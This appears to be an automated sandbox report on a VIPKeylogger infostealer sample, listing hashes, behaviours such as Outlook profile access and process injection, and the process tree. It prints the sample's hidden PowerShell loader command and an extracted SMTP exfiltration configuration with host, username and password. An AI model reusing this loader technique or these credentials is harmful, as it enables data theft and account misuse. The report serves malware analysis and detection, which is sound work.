Analysis
-
max time kernel
145s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2024 14:02
Static task
static1
Behavioral task
behavioral1
Sample
Rundholterne89.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Rundholterne89.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Levitator/Exungulate.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Levitator/Exungulate.ps1
Resource
win10v2004-20241007-en
General
-
Target
Rundholterne89.exe
-
Size
870KB
-
MD5
a1e239c4d5116e289ce0597a92844ede
-
SHA1
4562d452ccc32512291c3165a0b9b3c076b28094
-
SHA256
1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904
-
SHA512
500ddcdc2f1e3ca0da0a43006b99c6e78697433fc0757d25ddff94190dd2d725799faf267efdfacdef758e9024591368454f14025662cc6a1309bce7863494d2
-
SSDEEP
24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd
Malware Config
Extracted
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
pW@4G()=#2
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
pW@4G()=#2 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 624 powershell.exe 3260 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 18 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 39 2612 msiexec.exe 40 3968 msiexec.exe 42 3968 msiexec.exe 43 2612 msiexec.exe 45 2612 msiexec.exe 46 3968 msiexec.exe 48 3968 msiexec.exe 49 2612 msiexec.exe 51 2612 msiexec.exe 52 3968 msiexec.exe 57 2612 msiexec.exe 59 2612 msiexec.exe 62 3968 msiexec.exe 64 3968 msiexec.exe 65 2612 msiexec.exe 67 3968 msiexec.exe 69 2612 msiexec.exe 70 3968 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 56 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 2612 msiexec.exe 3968 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 3260 powershell.exe 624 powershell.exe 2612 msiexec.exe 3968 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exemsiexec.exeRundholterne89.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundholterne89.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 624 powershell.exe 624 powershell.exe 3260 powershell.exe 3260 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe 3260 powershell.exe 3260 powershell.exe 3260 powershell.exe 3260 powershell.exe 624 powershell.exe 3260 powershell.exe 2612 msiexec.exe 3968 msiexec.exe 2612 msiexec.exe 3968 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 3260 powershell.exe 624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 624 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeIncreaseQuotaPrivilege 624 powershell.exe Token: SeSecurityPrivilege 624 powershell.exe Token: SeTakeOwnershipPrivilege 624 powershell.exe Token: SeLoadDriverPrivilege 624 powershell.exe Token: SeSystemProfilePrivilege 624 powershell.exe Token: SeSystemtimePrivilege 624 powershell.exe Token: SeProfSingleProcessPrivilege 624 powershell.exe Token: SeIncBasePriorityPrivilege 624 powershell.exe Token: SeCreatePagefilePrivilege 624 powershell.exe Token: SeBackupPrivilege 624 powershell.exe Token: SeRestorePrivilege 624 powershell.exe Token: SeShutdownPrivilege 624 powershell.exe Token: SeDebugPrivilege 624 powershell.exe Token: SeSystemEnvironmentPrivilege 624 powershell.exe Token: SeRemoteShutdownPrivilege 624 powershell.exe Token: SeUndockPrivilege 624 powershell.exe Token: SeManageVolumePrivilege 624 powershell.exe Token: 33 624 powershell.exe Token: 34 624 powershell.exe Token: 35 624 powershell.exe Token: 36 624 powershell.exe Token: SeIncreaseQuotaPrivilege 3260 powershell.exe Token: SeSecurityPrivilege 3260 powershell.exe Token: SeTakeOwnershipPrivilege 3260 powershell.exe Token: SeLoadDriverPrivilege 3260 powershell.exe Token: SeSystemProfilePrivilege 3260 powershell.exe Token: SeSystemtimePrivilege 3260 powershell.exe Token: SeProfSingleProcessPrivilege 3260 powershell.exe Token: SeIncBasePriorityPrivilege 3260 powershell.exe Token: SeCreatePagefilePrivilege 3260 powershell.exe Token: SeBackupPrivilege 3260 powershell.exe Token: SeRestorePrivilege 3260 powershell.exe Token: SeShutdownPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeSystemEnvironmentPrivilege 3260 powershell.exe Token: SeRemoteShutdownPrivilege 3260 powershell.exe Token: SeUndockPrivilege 3260 powershell.exe Token: SeManageVolumePrivilege 3260 powershell.exe Token: 33 3260 powershell.exe Token: 34 3260 powershell.exe Token: 35 3260 powershell.exe Token: 36 3260 powershell.exe Token: SeDebugPrivilege 2612 msiexec.exe Token: SeDebugPrivilege 3968 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
Rundholterne89.exepowershell.exepowershell.exedescription pid process target process PID 1304 wrote to memory of 624 1304 Rundholterne89.exe powershell.exe PID 1304 wrote to memory of 624 1304 Rundholterne89.exe powershell.exe PID 1304 wrote to memory of 624 1304 Rundholterne89.exe powershell.exe PID 1304 wrote to memory of 3260 1304 Rundholterne89.exe powershell.exe PID 1304 wrote to memory of 3260 1304 Rundholterne89.exe powershell.exe PID 1304 wrote to memory of 3260 1304 Rundholterne89.exe powershell.exe PID 3260 wrote to memory of 2612 3260 powershell.exe msiexec.exe PID 3260 wrote to memory of 2612 3260 powershell.exe msiexec.exe PID 3260 wrote to memory of 2612 3260 powershell.exe msiexec.exe PID 3260 wrote to memory of 2612 3260 powershell.exe msiexec.exe PID 624 wrote to memory of 3968 624 powershell.exe msiexec.exe PID 624 wrote to memory of 3968 624 powershell.exe msiexec.exe PID 624 wrote to memory of 3968 624 powershell.exe msiexec.exe PID 624 wrote to memory of 3968 624 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Rundholterne89.exe"C:\Users\Admin\AppData\Local\Temp\Rundholterne89.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5c403847a7e1759d6de99def3e579d03a
SHA1df8b9616fce2b758786a0f28498dc0552b954898
SHA256c69c9183f96bf43cb994e6454be5ff5b2e63b02b99f7defbe18176e8fa77110d
SHA512f79f34aef3c0d27144aa1e6e95e033696a097d7427a455be7503c95df91c602f1e9c04b61d4fa3e36e87a7e5aefd0fe80914a0166781cbcc503c9633f391945e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5d27e8f4f186e50ed883dc1676cbb4038
SHA14dc99e2f5a1b7eafbceb0b837d9030424d67d8a4
SHA256ea5e76383ebf4550a6d4f3e561534cdbda582899df18c32c1ae085e0b1ff9ed8
SHA5123f6c599fdc2eaf4b42b1b594226438cc4d9b3a7846577b16307023c355757b794b1305b260c0d9e0071483e709dc7d5d190ba89ef3808185b4cd2d529c932372
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5fff9aba6fe7a03ac24297af4a6ef7600
SHA17ed4438da3b2bd2080a577c149f0029337d68fe8
SHA256510ed87ce53d8777b77a0de99754d355529f7f2f9e9a05690b927d1ced4dbe92
SHA51286b21267b1379717e414a374f113556c779246026569ab0adbda017d68532a62bd8999e5deb49f059b76c0c10ea15ca40e251f7efc5bdddbac7114ee002342c8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD50617862da103d7d6d9331420105cdb69
SHA1d035931277d2d0e40496acda69b584d965f877c5
SHA256c41c91588ab269c507d23c8a6dbf7e060fc172887707050702901b7aee26cc38
SHA5124857a30ba0a82242f59da21fd22b1b55f452f384a7320d987cb4c0ea7260484d0a748cb0c2bb98ec18d1ab5e1c99ddf7bfb4ca22792d72db1bc9a6032b93d618
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD596331c468bd6b1b7fe9e8d972c9a0bf8
SHA1e230eebb04dccb366028cbff8ce7df8c203e3821
SHA256d77a65658628b6fc9d4e99bfeb5d3c892c0f83e37d6cdc628b3a8679ea76bc04
SHA512eb8d40e788defcc55cdc302d63cce825972a6a1778935e9316629d95f1f71f98ed75b819f5cfa2cf4a2b556358b3f4fcfb42e45d538d046e9ab7e9e143c20847
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD57312e24a52cfc49e78d51926a4aa1b82
SHA1e62e828673c0bf659034290e82bc790a80000a16
SHA256fd1af1b63a6f760dcfdf5a445e333b99d9b8e35e5d7d2514af553d9f6d4a4147
SHA512379e5aa633c6d98eb7aa71a8710f33766463cb785ebcbc6e15c9faa985481446d5dde88c0593d0727ace7528f069ae9bedca1258a97a55189b16a77bb34fc51a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD59247f031a3a69f2e64081c178c96aa48
SHA10814e34a2e58e09954aa6a7c0d7ccbfad1a1a71d
SHA256bf17f5978ad0367951e80606ec21d25d87be81b1d865d7da2db897f70d9d81aa
SHA512aa42c76a8a25595261ec1759a196ef51361815edadb8657c386592a63362f91a53d8293bfdf2d500a0564e018efff9961da3529781dc3276d1903424f703fa08
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD5da5a3eb289a81a340aee6fd5563e959d
SHA1feb0d479497ecd3a96d6c9acc440b4693129d39c
SHA2566c0ce5c5b1434e14c0ee13086da6572fcab891c8baca80f19b202874f4685d29
SHA51292b6edb70da1030238fd1c60f0b7ba9578c17e7aa54eba77f48b95403156193de7c3e240148769f62d56f77f594ca93dd727711cf441f781d1c388b24e6dd9de
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD549546f238a6ad64b3281fa0344a30b57
SHA11082e1a233f638f56bd905a18007c6e63e82ea0c
SHA256059eee06e6b711b7ca43e898621eef7c70ab16fd4ec7e8898872d8fd194da8f0
SHA51215a6a8d353520706fcfd31a91ad4db204cec8ccc871e88847b0e5c8ec4a07917bb402a641a683175c1b571c60f9ce8c744926b09695dada68fd9eee09cf908c2
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
54KB
MD50d2ce39822e9236a380f4d1d53550e93
SHA18381b0e62708112dbfbed036650bf0667ec4476b
SHA256ed34db2a55a35c90b524d2448353eb73d28da7d7ff401477165c226ff25de9af
SHA512f365bb861db3fc6d29736b3f8c0377bb4f8318fff94bc96033ae208760082b529b8aea4cf79de9efa3608c79ac91fe57e19f26959831f621bba8816e1013afc3
-
Filesize
332KB
MD5d3086578d45d821207eac6cbb8e24a2b
SHA10772cbce5403edae1aab6310b2f58d7f99c726c0
SHA256e856fc4f6b157e7799c1af872064cd1be9f982b1a5d18d7b16e5c3a48e3a1b1a
SHA5127db853becc19b209c0534c8f09635c55dab9bc540bd138054c2e84bbfc396bfa587bd4549a7188824f95271c04894bb7c66795f75267bca16620bc27ed38807d